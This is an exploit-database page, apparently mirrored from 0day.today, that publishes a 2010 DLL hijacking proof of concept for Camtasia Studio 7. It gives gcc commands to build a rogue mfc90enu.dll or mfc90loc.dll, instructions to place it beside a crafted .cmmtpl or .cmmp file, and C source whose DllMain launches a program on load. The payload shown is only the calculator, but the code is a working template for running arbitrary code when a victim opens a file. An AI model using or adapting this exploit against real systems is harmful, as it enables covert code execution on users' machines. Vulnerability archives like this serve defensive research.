Lucene search
K

Camtasia Studio 7 (mfc90enu.dll, mfc90loc.dll) DLL Hijacking Exploit

🗓️ 27 Aug 2010 00:00:00Reported by p4r4N0IDType 
zdt
 zdt
🔗 0day.today👁 20 Views

Camtasia Studio 7 DLL Hijacking Exploit by p4r4n0id, Techsmit

Code
====================================================================
Camtasia Studio 7 (mfc90enu.dll, mfc90loc.dll) DLL Hijacking Exploit
====================================================================

/*-------------------------------------------------------------------------*/
/**

  [*] Camtasia Studio 7  (mfc90enu.dll, mfc90loc.dll) DLL Hijacking Exploit
  
  [*] Date: 26/08/2010

  [*] Author: p4r4n0id
  
  [*] Vendor: Techsmith

  [*] Product Web Page: http://www.techsmith.com/camtasia.asp
      
  ----
  gcc -shared -o mfc90enu.dll evil_dll.c
 
  Compile and rename to mfc90enu.dll, create a file boom.cmmtpl or boom.cmmp and put
  both files in same dir, execute and do your math homework. :)
  
  
  gcc -shared -o mfc90loc.dll evil_dll.c
  
  Compile and rename to mfc90loc.dll, create a file boom.cmmtpl and put
  both files in same dir, execute and and do your math homework. :)
  
  ----

  
**/
/*--------------------------------------------------------------------------*/

#include <windows.h>


int calc();

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		calc();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int calc()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}



#  0day.today [2018-03-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Aug 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
20